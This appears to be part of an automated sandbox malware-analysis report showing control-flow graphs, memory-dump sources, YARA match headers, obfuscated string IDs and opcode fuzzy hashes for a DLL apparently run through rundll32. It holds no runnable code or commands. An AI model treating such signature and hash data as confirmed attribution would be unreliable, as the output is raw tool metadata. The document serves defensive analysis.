                                                                    control_flow_graph 295 18000c608-18000c62d 296 18000c632-18000c637 295->296 297 18000cc8a-18000cc8f 296->297 298 18000c63d 296->298 299 18000cc95-18000cc9a 297->299 300 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 297->300 301 18000c643-18000c648 298->301 302 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 298->302 304 18000ce33-18000ced7 call 180008ad8 call 18001c32c 299->304 305 18000cca0-18000cca5 299->305 328 18000cfb4-18000d00a call 1800194a4 300->328 306 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 301->306 307 18000c64e-18000c653 301->307 329 18000cc28-18000cc85 call 1800194a4 302->329 343 18000cedc-18000cf26 call 1800194a4 304->343 311 18000cd35-18000cdce call 18000703c call 18001c32c 305->311 312 18000ccab-18000ccb0 305->312 306->296 314 18000c9c1-18000ca52 call 18002870c call 18001c32c 307->314 315 18000c659-18000c65e 307->315 348 18000cdd3-18000ce2e call 1800194a4 311->348 320 18000ccb6-18000cd30 call 180021434 312->320 321 18000d00f-18000d014 312->321 351 18000ca57-18000caa0 call 1800194a4 314->351 323 18000c664-18000c669 315->323 324 18000c8bb-18000c963 call 180002610 call 18001c32c 315->324 320->296 321->296 331 18000d01a-18000d020 321->331 335 18000c7b2-18000c85a call 180019618 call 18001c32c 323->335 336 18000c66f-18000c674 323->336 363 18000c968-18000c9bc call 1800194a4 324->363 328->321 329->296 368 18000c85f-18000c8b6 call 1800194a4 335->368 336->321 346 18000c67a-18000c73d call 180002178 call 18001c32c 336->346 343->296 369 18000c742-18000c7ad call 1800194a4 346->369 348->296 351->296 363->296 368->296 369->296
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 390 18001c964-18001c99f 391 18001c9a2-18001c9a7 390->391 392 18001cbac-18001cbfd call 18000abac 391->392 393 18001c9ad-18001c9b2 391->393 400 18001cc02-18001cc08 392->400 394 18001c9b8-18001c9bd 393->394 395 18001cb50-18001cba7 call 180010dd0 393->395 397 18001c9c3-18001c9c8 394->397 398 18001cae9-18001cb4b call 180001b1c 394->398 395->391 401 18001cc25-18001cc90 call 180001b1c 397->401 402 18001c9ce-18001c9d3 397->402 398->391 404 18001cc14 400->404 405 18001cc0a-18001cc0f 400->405 414 18001cc95-18001cca1 401->414 408 18001cac1-18001cacf 402->408 409 18001c9d9-18001c9de 402->409 410 18001cc19-18001cc1e 404->410 405->391 416 18001cad5-18001cad9 408->416 412 18001c9e4-18001c9e9 409->412 413 18001cab7-18001cabc 409->413 410->414 415 18001cc20 410->415 412->410 417 18001c9ef-18001cab2 call 18002b4c4 412->417 413->391 415->391 418 18001cad1-18001cad2 416->418 419 18001cadb-18001cae4 416->419 417->391 418->416 419->391
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xDC
                                                                    • API String ID: 0-90241050
                                                                    • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                    • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 433 180022010-18002203b 434 18002203d-180022043 433->434 435 180022338-1800223a1 call 18001455c 434->435 436 180022049-18002204f 434->436 443 1800223a6-1800223ac 435->443 437 180022055-18002205b 436->437 438 18002232e-180022333 436->438 441 180022061-180022067 437->441 442 1800222be-180022329 call 180019cb4 437->442 438->434 445 180022069-18002206f 441->445 446 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 441->446 442->434 443->434 447 1800223b2-1800223c2 443->447 445->443 450 180022075-180022083 445->450 446->443 451 180022089-18002208d 450->451 453 180022085-180022086 451->453 454 18002208f-180022098 451->454 453->451 454->434
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 643 1800059b8-180005a02 644 180005a04-180005a09 643->644 645 180006107-1800061a6 call 180001b1c 644->645 646 180005a0f-180005a14 644->646 657 1800061ab-1800061b0 645->657 647 180005a1a-180005a1f 646->647 648 180005fcd-180006102 call 180016314 646->648 651 180005a25-180005a2a 647->651 652 180005da6-180005fb1 call 1800093f0 647->652 648->644 655 1800061bb-18000625a call 180001b1c 651->655 656 180005a30-180005a35 651->656 668 180005fc3-180005fc8 652->668 669 180005fb3-180005fbe 652->669 662 18000625f-180006271 655->662 659 180005a3b-180005a40 656->659 660 180005d7e-180005d8c 656->660 661 1800061b6 657->661 657->662 665 180005a46-180005a4b 659->665 666 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 659->666 667 180005d92-180005d96 660->667 661->644 671 180005a51-180005a56 665->671 672 180005ad8-180005b68 call 18000abac 665->672 666->644 673 180005d98-180005da1 667->673 674 180005d8e-180005d8f 667->674 668->644 669->644 671->657 676 180005a5c-180005ad3 call 180007958 671->676 672->662 681 180005b6e-180005b73 672->681 673->644 674->667 676->644 681->644
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 686 180013780-1800137f4 call 1800142a0 689 1800137fb-180013800 686->689 690 180013806-18001380b 689->690 691 180013c55-180013ce4 call 18002620c 689->691 692 180013811-180013816 690->692 693 180013c4b-180013c50 690->693 700 180013ce6-180013ceb 691->700 701 180013cf0 691->701 695 18001381c-180013821 692->695 696 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 692->696 693->689 698 180013cf5-180013cfa 695->698 699 180013827-1800138a9 call 18000290c 695->699 696->689 704 1800138ae-1800138cc 698->704 705 180013d00 698->705 699->704 700->689 701->698 705->689
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >97"$?$LsRW$~x
                                                                    • API String ID: 0-2554301858
                                                                    • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                    • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0
